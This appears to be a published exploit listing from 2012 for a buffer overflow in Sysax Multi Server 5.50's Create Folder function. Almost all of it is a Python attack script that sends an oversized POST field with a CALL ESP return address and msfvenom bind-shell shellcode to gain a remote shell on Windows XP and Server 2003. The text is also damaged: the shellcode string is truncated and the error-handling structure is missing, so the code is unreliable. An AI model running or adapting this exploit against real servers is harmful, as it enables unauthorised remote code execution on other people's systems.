HistoryJan 18, 2012 - 12:00 a.m.

Sysax Multi Server 5.50 - Create Folder Buffer Overflow

Craig Freyman

#Title: Sysax Multi Server 5.50 Create Folder BOF
#Author: Craig Freyman (@cd1zz)
#Tested on: XP SP3 32bit and Server 2003 SP2 32bit(No DEP)
#Date Discovered: January 13, 2012
#Vendor Contacted: January 15, 2012
#Vendor Response: January 16, 2012
#Vendor Fix: Version 5.52 released on January 17, 2012 fixes issue
#Additional exploit details, notes and assumptions can be found here:

import socket,sys

if len(sys.argv) != 5:
    print "[+] Usage: ./ <Target IP> <Port> <SID> <XP or 2K3>"
target = sys.argv[1]
port = int(sys.argv[2])
sid = sys.argv[3]
os = sys.argv[4]

if len(sid) != 40:
    print "[X] Something is wrong with your SID, it should be 40 bytes long."
    print "[X] Refer to"

#msfvenom -p windows/shell_bind_tcp LPORT=4444 -e x86/shikata_ga_nai -b "\x00"
#[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)

shell = ("\xda\xdc\xd9\x74\x24\xf4\x5f\x2b\xc9\xb8\xb7\x6e\xc5\xe9" 

#No DEP bypass :(
if os == "2K3":
     junk = "\x41" * 648
     jump = "\xDF\xF2\xE5\x77"	#77E5F2DF CALL ESP kernel32.dll
     buf = junk + jump + "\x90" * 10 + shell + "\x44" * 1000

if os == "XP":
     junk = "\x41" * 667
     jump = "\xF0\x69\x83\x7C" 	#7C8369F0 CALL ESP kernel32.dll
     buf = junk + jump + "\x90" * 50 + shell + "\x44" * 1000

print "================================================"
print "[*] Sysax Multi Server 5.50 Create Folder BOF"
print "[*] ------------------by cd1zz------------------"
print "[*] Launching exploit against " + target + "...."
print "================================================"

head = "POST /scgi?sid="+sid+"&pid=mk_folder2_name1.htm HTTP/1.1\r\n"
head += "Host: \r\n"
head += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:9.0.1) Gecko/20100101 Firefox/9.0.1\r\n"
head += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
head += "Accept-Language: en-us,en;q=0.5\r\n"
head += "Accept-Encoding: gzip, deflate\r\n"
head += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
head += "Proxy-Connection: keep-alive\r\n"
head += "Referer: http://"+target+"/scgi?sid="+sid+"&pid=mk_folder1_name1.htm\r\n"
head += "Content-Type: multipart/form-data; boundary=---------------------------1190753071675116720811342231\r\n"
head += "Content-Length: 171\r\n\r\n"
head += "-----------------------------1190753071675116720811342231\r\n"
head += "Content-Disposition: form-data; name=\"e2\"\r\n\r\n"
head += buf+"\r\n"
head += "-----------------------------1190753071675116720811342231--\r\n\r\n"
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((target, port))
    s.send(head + "\r\n")
    print "[*] Payload sent!"
    print "[*] Go check your shell..."
    print "[X] Meh! Fail!"